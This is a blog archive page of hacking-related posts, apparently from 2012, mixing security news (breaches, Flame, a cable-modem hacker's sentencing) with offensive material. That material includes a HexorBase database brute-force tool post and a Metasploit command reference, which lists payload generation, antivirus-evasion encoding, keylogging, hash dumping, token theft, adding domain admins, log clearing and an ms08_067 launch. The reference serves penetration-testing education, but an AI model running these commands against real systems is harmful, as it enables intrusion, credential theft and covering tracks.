Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?
Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS.
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Tuesday, September 10, 2013
Monday, July 30, 2012
Apple to talk iOS security at Black Hat 2012 conference
Apple is set to make its first official appearance at the security-focused Black Hat conference this year. The move is both surprising given the company’s tradition of avoiding most major technology conferences, and significant as their products have become a bigger target for hackers in recent times.
Apple hasn’t made an official announcement yet and declined to comment on rumors, but Black Hat’s general manager Trey Ford told Bloomberg that Apple's platform security team manager Dallas De Atley is scheduled to give a presentation on key security technologies within the iOS platform.
Interestingly, Ford claims a panel of Apple insiders were originally scheduled to speak about the company's security-response team at Black Hat four years ago, but cancelled abruptly when Apple’s marketing department caught wind of it. “Bottom line — no one at Apple speaks without marketing approval,” he said, while confirming that this time around Apple marketing is on board for Black Hat 2012.
Microsoft security researchers first spoke at the conference in 1998 and the first time Google took the stage was in 2010. Now, under Tim Cook’s helm, it appears Apple is finally acknowledging the need to publicly engage with the community and discuss the security of its own platforms.
Earlier this year, the company was criticized for being to slow to respond to a Java flaw exploited by the Flashback Trojan, which ended up infecting more than 600,000 Macs between February and May. They were also in the spotlight recently over a simple hack that allowed iOS and Mac users to install premium in-app purchases from the App Store for free, which ultimately affected developers.
Tuesday, July 24, 2012
Over 8 million Gamigo user logins leaked months after breach
Millions of user logins swiped from a German gaming company earlier this year have appeared online this month. In February, hackers bypassed the security of free-to-play MMORPG outfit Gamigo, taking over 11 million email addresses and encrypted passwords (though only 8.24 million of the addresses were unique), making it the largest breach of its kind this year, topping June's leak of 6.46 million LinkedIn credentials.
After appearing online this month, security researchers have analyzed the dump, which reportedly includes 3 million US (.com) email addresses, 2.4 million German (.de) addresses, 1.3 million French (.fr) addresses, and 100,000 t-online.de addresses. Users affected by the breach don't really have to worry about their Gamigo account being compromised as the company quickly forced passwords to be reset back in March.
However, folks who used their Gamgio credentials across multiple sites remain at risk and should be extra vigilant about resetting the passwords to those accounts -- especially the email account used on Gamigo. The leak contains addresses for various services including Windows Live Hotmail, Gmail and Yahoo, as well as accounts at companies such as Allianz, Deutsche Bank, ExxonMobil, IBM and Siemens.
ZDNet notes that over 5,000 email addresses were created specifically to register at Gamigo, suggesting those users should be safe, but that's only a tiny fraction of the accounts involved. It's also worth emphasizing that Gamigo protected user passwords with a one-way cryptographic hash algorithm, so complicated passwords may remain secure. PwnedList will tell you if your email address is involved.
Microsoft beefs up Xbox Live's security to combat online fraud
With services being hacked left and right, Microsoft has acted on user feedback submitted in recent months byintroducing new security measures to Xbox Live. Along with unexplained "security enhancements" implemented behind the scenes during Xbox Live's spring update, the company increased notifications to accounts that may be compromised, encouraging them to update their passwords.
Microsoft has also begun sending unique codes to security phone numbers and secondary email addresses used to verify authorization for account changes and charges that don't come from a trusted device.
The company is working to reduce incentives for criminal activity such as trading stolen accounts as well as committing identity theft and credit card fraud by using legal action to have such material pulled off the Web. Individuals caught illegally buying or selling gamertags, usernames and passwords gathered from malware and phishing schemes risk criminal prosecution.
The advice has been beaten to death, but Microsoft mentioned that users should change their passwords frequently and use unique credentials for every service, noting that "password" and "12345" are still the most commonly used passwords when login data is dumped online after breaches. The company also encourages members to check their security informationregularly.
"The Internet has transformed the way we purchase goods and services and added layers of convenience to our lives. Yet, disappointingly, online fraud increasingly victimizes millions of unsuspecting consumers each year. The organized groups of criminals involved do not care about the time or expense experienced by individuals they've attacked; or the billions in currency global companies and financial institutions absorb each year from their illegal activities. In the end, all of us pay a high price for online fraud," said Xbox Live General Manager Alex Garden. "That is why our resolve at Microsoft to battle fraud and our commitment to account security is stronger than ever. I hope you’ll take a few moments to protect your account today."
Labels:
breaches,
feedback,
fraud,
hacking,
login data,
Microsoft,
usernames and passwords,
Xbox 360,
Xbox Live
Friday, July 20, 2012
password theft soars 300% to 12 million in the first quarter
Cybercriminals illegally trading stolen personal information online such as passwords has soared exponentially to 300% during the first four months of 2012, according to the latest research from Experian CreditExpert and market research agency Opinion Matters.
Experian concluded that 12 million pieces of personal information were illegally sold during the four-month period, 90% of which consisted of login details and passwords. The figures dwarf the credit agency's data for last year, which totaled 9.5 million.
"The reason password and login combinations make up nine out of ten illegally traded pieces of data is because they give access to a huge amount of other valuable information, such as address books and related accounts," said Peter Turner, managing director at Experian Consumer Services in the UK and Ireland.
The research suggested consumers were still not being as careful online as they could be, and revealed that Britons on average used just five different passwords for their 26 online accounts. It also revealed that a quarter of British internet users used a single password for most of their online profiles and accounts.
Experian urges consumers to create different strong passwords for each site, but Websense Security Labs senior manager Carl Leonard disagrees that strong passwords are enough to protect important data.
"They're as strong as a simple lock against professional thieves. Passwords can be guessed, cracked or stolen through social engineering," Leonard said. "Worse still businesses can be attacked and stories of breached password databases make for uneasy reading. Businesses need to think carefully how they secure password information for which they are responsible -- encrypting password records and securing the database makes good sense."
So far this year, an increasing number of sites have succumbed to hackers, with breaches resulting in millions of passwords being published online. With identity theft increasing, it's important to make online accounts as secure as possible.
Leading security authorities recommend passwords at least eight characters long with a mixture of lower and upper case letters, numbers and special characters -- but most importantly, that they are different for each online account you have. Services like LastPass can also help by creating randomly generated passwords for each of your online accounts with one master password to remember.
Labels:
breach,
experian,
hacking,
identity theft,
opinion matters,
personal information,
research
Saturday, June 30, 2012
Hacker gets three years in prison for selling 'rooted' cable modems
A 28-year-old Oregon man has been sentenced tothree years in prison for selling illegal products and services that allowed users to bypass restrictions imposed by ISPs. Ryan Harris, known online as DerEngel, reportedly earned between $400,000 and $1 million over several years through the illegal activity, which included the modification of cable modems to remove filters set by ISPs, allowing users to enjoy faster connections sans limitations without the provider's blessings.
It's reported that through his company, TCNISO, Harris sold hacked cable modems for up to $100 that supplied buyers with free Internet. He also offered various hacking products including "Sigma," "Blackcat" and "DreamOS" that granted free or enhanced Internet access. One product, "Coax Thief," intercepted MAC addresses and configuration data from neighbors. Harris went as far as writing a book titled "Hacking the Cable Modem: What Cable Companies Don't Want You to Know."
"Mr. Harris acted with absolute, knowing malice," said prosecutor Mona Sedky, adding that he was motivated by greed and a desire to "punish" cable companies. "He acted on a grievance, as a lot of young people do," said Charles McGinty, Harris' federal public defender. McGinty insisted that while Harris was misguided, he was motivated by anger that ISPs could control the speed and quality of a customer's connection.
Laurie Jill Wood, director of security for Charter Communications, commented on the case Wednesday, claiming the company spent years combating Harris' wrongdoings. Because he cloned so many modems, Harris caused various headaches for Charter, including the accidental disconnection of legitimate subscribers. Even worse, Charter has been unable to identify users suspected of unrelated computer crimes.
"I think you committed a very serious crime," US District Judge Mark L. Wolf told Harris. In addition to a three-year prison sentence starting September 4, Harris will have three years of supervised release and must pay roughly $200,000 in fines and restitution.
Sunday, June 24, 2012
Flame virus created by U.S. and Israel sources say, Iran is target
The Washington Post reports that Flame, an extremely sophisticated virus which was first discovered in Iranian oil refineries, is the brainchild of U.S. and Israeli efforts to slow Iran's nuclear program. This information comes from several Western officials who purportedly have knowledge of the project, but wish to remain anonymous.
Despite the report's veiled sources, Flame's U.S. origins aren't necessarily a surprise. Earlier this month, the New York Times shed light uponOperation: Olympic Games, a U.S. project which utilized other sophisticated viruses known as Duquand Stuxnet. These virus targeted Iranian SCADA systems, allowing their creators to access, gather intelligence and even control certain aspects of Iran's nuclear and oil refining facilities.
Security researchers recently discovered Stuxnet code within Flame -- an unofficial confirmation that the creators of Stuxnet (i.e. U.S. government) were also behind the virus. After this discovery was made, the virus began to self-destruct, hastily removing itself from infected computers as though it were taking cues from a spy novel.
Flame wowed security researchers with its incredible sophistication. The 20MB virus carried a payload which could be transmitted through spoofing Windows Updates, allowing it to infect even non-compromised computers on the same network. The creators used what is believed to be an unknown MD5 collision attack to forge Microsoft's digital signature on a fraudulent certificate, an achievement which was described by security researchers as the holy grail of malware writers.
Flame also has modules which could utilize microphones and web cameras, log keystrokes, collect screen shots and allow it to propagate via removable media (i.e. USB thumb drives), allowing it to be introduced into sensitive networks isolated from the public. It would even use Bluetooth to send commands to other computers, providing a bevy of vectors for infecting, monitoring and controlling nearby workstations.
Labels:
Flame virus,
government,
hacking,
iran,
malware,
NSA,
security,
united states
Friday, June 22, 2012
Penetration Testing Secrets
A nice technical presentation from Chris Gates and from Rob Fuller which was published during DerbyCon 2011 event:
Labels:
Class,
ethical,
hack,
hacking,
metasploit,
meterpreter,
penentration,
PenTest,
pentesting,
secrets,
teaching
Brute Force Database Servers with HexorBase
HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.
It works on Linux and Windows running the following:
Requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
Code:
root@host:~# dpkg -i hexorbase_1.0_all.deb
To get the source code for this project from SVN, here’s the checkout link:
Code:
root@host:~# svn checkout http://hexorbase.googlecode.com/svn/
Heres a video on how the program works
Download:
Metasploit Commands – CLI Index
I was going through the Metasploit The Penetration Tester’s Guide by David Kennedy,Jim O’Gorman, Devon Kearns and Mati Aharoni . Guys I must say it is worth reading .
This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.
MSFconsole Commands:
Code:
show exploits
Show all exploits within the Framework.
Code:
show payloads
Show all payloads within the Framework.
Code:
show auxiliary
Show all auxiliary modules within the Framework.
Code:
search name
Search for exploits or modules within the Framework.
Code:
info
Load information about a specific exploit or module.
Code:
use name
Load an exploit or module (example: use windows/smb/psexec).
Code:
LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
Code:
RHOST
The remote host or the target.
Code:
set function
Set a specific value (for example, LHOST or RHOST).
Code:
setg function
Set a specific value globally (for example, LHOST or RHOST).
Code:
show options
Show the options available for a module or exploit.
Code:
show targets
Show the platforms supported by the exploit.
Code:
set target num
Specify a specific target index if you know the OS and service pack.
Code:
set payload payload
Specify the payload to use.
Code:
show advanced
Show advanced options.
Code:
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.
Code:
check
Determine whether a target is vulnerable to an attack.
Code:
exploit
Execute the module or exploit and attack the target.exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)
Run the exploit under the context of the job. (This will run the exploit in the background.)
Code:
exploit -z
Do not interact with the session after successful exploitation.
Code:
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
Code:
exploit -h
Display help for the exploit command.
Code:
sessions -l
List available sessions (used when handling multiple shells).
Code:
sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
Code:
sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.
Code:
sessions -K
Kill all live sessions.
Code:
sessions -c cmd
Execute a command on all live Meterpreter sessions.
Code:
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.
Code:
db_create name
Create a database to use with database-driven attacks (example: db_create autopwn).
Code:
db_connect name
Create and connect to a database for driven attacks (example: db_connect autopwn).
Code:
db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)
Code:
db_autopwn -h
Display help for using db_autopwn.
Code:
db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
Code:
db_destroy
Delete the current database.
Code:
db_destroy user:password@host:port/database
Delete database using advanced options.
Meterpreter Commands help:
Open Meterpreter usage help.
Open Meterpreter usage help.
Code:
run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
Code:
sysinfo
Show the system information on the compromised target.
Code:
ls
List the files and folders on the target.
Code:
use priv
Load the privilege extension for extended Meterpreter libraries.
Code:
ps
Show all running processes and which accounts are associated with each process.
Code:
migrate PID
Migrate to the specific process ID (PID is the target process ID gained from the ps command).
Code:
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine.)
Code:
list_tokens -u
List available tokens on the target by user.
Code:
list_tokens -g
List available tokens on the target by group.
Code:
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.
Code:
steal_token PID
Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.
Code:
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
Code:
shell
Drop into an interactive shell with all available tokens.
Code:
execute -f cmd.exe -i
Execute cmd.exe and interact with it.
Code:
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.
Code:
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.
Code:
rev2self
Revert back to the original user you used to compromise the target.
Code:
reg command
Interact, create, delete, query, set, and much more in the target’s registry.
Code:
setdesktop number
Switch to a different screen based on who is logged in.
Code:
screenshot
Take a screenshot of the target’s screen.
Code:
upload file
Upload a file to the target.
Code:
download file
Download a file from the target.
Code:
keyscan_start
Start sniffing keystrokes on the remote target.
Code:
keyscan_dump
Dump the remote keys captured on the target.
Code:
keyscan_stop
Stop sniffing keystrokes on the remote target.
Code:
getprivs
Get as many privileges as possible on the target.
Code:
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.
Code:
background
Run your current Meterpreter shell in the background.
Code:
hashdump
Dump all hashes on the target.
Code:
use sniffer
Load the sniffer module.
Code:
sniffer_interfaces
List the available interfaces on the target.
Code:
sniffer_dump interfaceID pcapname
Start sniffing on the remote target.
Code:
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.
Code:
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.
Code:
sniffer_stop interfaceID
Stop the sniffer.
Code:
add_user username password -h ip
Add a user on the remote target.
Code:
add_group_user "Domain Admins" username -h ip
Add a username to the Domain Administrators group on the remote target.
Code:
clearev
Clear the event log on the target machine.
Code:
timestomp
Change file attributes, such as creation date (antiforensics measure).
Code:
reboot
Reboot the target machine.
MSFpayload Commands:
Code:
msfpayload -h
List available payloads.
Code:
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
Same as above, but export as raw format. This will be used later in msfencode
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.
MSFencode Commands:
Code:
msfencode -h
Display the msfencode help.
Code:
msfencode -l
List the available encoders.
Code:
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
Format to display the encoded buffer.
Code:
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Create a multi-encoded payload.
Code:
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.
MSFcli Commands:
Code:
msfcli | grep exploit
Show only exploits.
Code:
msfcli | grep exploit/windows
Show only Windows exploits.
Code:
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on port 443.
Labels:
audit,
auxiliary,
cli,
command,
commands,
exploit,
exploitation,
exploits,
hack,
hacking,
index,
metasploit
Subscribe to:
Posts (Atom)
